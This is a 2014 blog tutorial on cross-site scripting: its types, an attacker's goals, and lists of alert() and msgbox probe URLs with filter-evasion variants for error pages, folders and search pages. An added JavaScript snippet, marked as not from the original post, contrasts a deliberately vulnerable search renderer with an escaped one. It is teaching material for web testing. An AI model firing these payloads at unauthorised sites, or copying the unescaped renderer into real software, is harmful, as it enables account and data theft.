Friday, 10 January 2014

In this tutorial we will look at how and where to find XSS, and at the impact XSS can have.


Table Of Contents:
1. What is Cross Site Scripting?
2. Who does it hurt?
3. Types of XSS
4. What can a Hacker achieve with XSS?
5. How to find it?

1. What is Cross Site Scripting?
Cross Site Scripting is currently the most common vulnerability in the world. It is a vulnerability of a host that allows anyone to inject code or scripts into a page it serves. The injected content can be HTML tags, JavaScript, or VBScript.

Cross Site Scripting exists because websites, forms and web servers lack filtering of user input before that input is placed back into a page.

2. Who does it hurt?
Cross Site Scripting mostly hurts the *users* who visit the injected website. A website can contain scripts that harm the user who visits it, so whenever a user chooses to surf to a website, he is taking a certain amount of risk.

This is pretty obvious, but what if the user surfs to a website known or marked as safe? This is where Cross Site Scripting fits in. So why would I click that evil link? Because it is a link to my bank (for example).

A big risk to the administrator is receiving an email containing a script or link that uses the XSS vulnerability against the administrator's own session and steals his files, data, passwords or cookies.

In some *very rare* cases Cross Site Scripting can lead to a remote compromise, meaning the server itself is hurt.

3. Types of XSS Attacks
There are three types of XSS:
• Persistent (Stored) - the XSS payload is stored on the website's server
• Non Persistent (Reflected) - the user has to follow a specially crafted link to be exposed
• DOM-based XSS - the problem exists within the client-side script

4. What can a Hacker achieve with XSS?
• Temporary defacement via Reflected XSS
• Permanent defacement via Persistent XSS
• Command manipulation in an unauthorised area
• CSRF token bypass
• Cookie stealing
• URL-spoofed phishing
• URL-spoofed trojan dropping
• Cross Site Port Attacks (XSPA)
• Network scanning with XSS
• Keylogging and screen scraping
• Browser crashing
• HTTP traffic tunneling with XSS
• and many other malicious activities using the BeEF framework

5. How to find it?
This is the best part. Whenever, while browsing a website, you see input you supplied (or something taken from your environment) shown or used inside the page, that is a sign that XSS may be possible.

First, I recommend checking the server's error reply. Many times, when a non-existent filename is requested, the server echoes the request back in quotes. So simply browsing to one of the following URLs has a good chance of finding XSS.

http://[host]/<script>alert("XSS")</script>
http://[host]/<script>alert('XSS')</script>/
http://[host]/<script>alert('XSS')</script>
http://[host]/\<script\>alert(\'XSS\')\<\/script\>
http://[host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://[host]/perl/\<sCRIPT>alert('d')</sCRIPT>\.pl
http://[host]/\<sCRIPT>alert("d")</sCRIPT>\
http://[host]\<sCRIPT>alert('d')</sCRIPT>\

These requests should also be tested as a query string, i.e. with a '?' after the host:

http://[host]/?<script>alert("XSS")</script>
http://[host]/?<script>alert('XSS')</script>
http://[host]/?\<script\>alert(\'XSS\')\<\/script\>
http://[host]/perl/?\<sCRIPT>alert("d")</sCRIPT>\.pl
http://[host]/perl/?\<sCRIPT>alert('d')</sCRIPT>\.pl
http://[host]/?\<sCRIPT>alert("d")</sCRIPT>\
http://[host]\?<sCRIPT>alert('d')</sCRIPT>\
http://[host]/?<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
http://[host]/?<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
http://[host]/?</sCRIP/T>alert("dsf")<///sCRIP/T>
http://[host]/?</sCRIP/T>alert('dsf')<///sCRIP/T>

XSS inside folders:
Many web servers have default handlers for folders that look up the requested file and echo our script back in the reply.
For example, an XSS I found on Novell NetWare:
http://[host]/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
But the general idea is:
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html
http://[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]

A common place for an XSS hole is inside a server's default example files, such as:
http://[host]/cgi/example?test=<script>alert('xss')</script>

One of the most common places to find XSS is in a site's search pages, for example:
http://[host]/search.php?searchstring=<script>alert('XSS')</script>
http://[host]/search.php?searchstring="><script>alert('XSS')</script>
http://[host]/search.php?searchstring='><script>alert('XSS')</script>
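As an added example that is not part of the original post: a minimal search-page renderer in JavaScript, written the way the search.php examples above imply (the parameter is reflected unescaped), beside the hardened version that HTML-encodes the parameter, plus the reflection check that tells the two apart. The function and parameter names are assumed for illustration.

```javascript
// Added example (not from the original post). Route and parameter names are
// assumed; "searchstring" mirrors the search.php examples above.

// Encode the five characters that matter in an HTML text or attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the user input lands in the HTML exactly as it was sent,
// once in a text node and once inside a quoted attribute.
function renderSearchVulnerable(searchstring) {
  return '<p>Results for: ' + searchstring + '</p>\n' +
         '<input type="text" name="searchstring" value="' + searchstring + '">';
}

// Hardened: every occurrence of the input is encoded before it is written out.
function renderSearchSafe(searchstring) {
  const safe = escapeHtml(searchstring);
  return '<p>Results for: ' + safe + '</p>\n' +
         '<input type="text" name="searchstring" value="' + safe + '">';
}

// The check a tester (or a regression test) runs against a response body:
// does the probe string come back unmodified?
function isReflectedUnencoded(responseBody, probe) {
  return responseBody.includes(probe);
}

// Constructed probes, taken from the search.php URLs above (URL-decoded).
const PROBES = [
  "<script>alert('XSS')</script>",
  "\"><script>alert('XSS')</script>",
];

// Returns one boolean per probe: true means the handler reflects it verbatim.
function checkHandler(render) {
  return PROBES.map((p) => isReflectedUnencoded(render(p), p));
}

console.log('vulnerable:', checkHandler(renderSearchVulnerable)); // [ true, true ]
console.log('hardened:  ', checkHandler(renderSearchSafe));       // [ false, false ]
```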

That's all for a basic understanding of XSS.
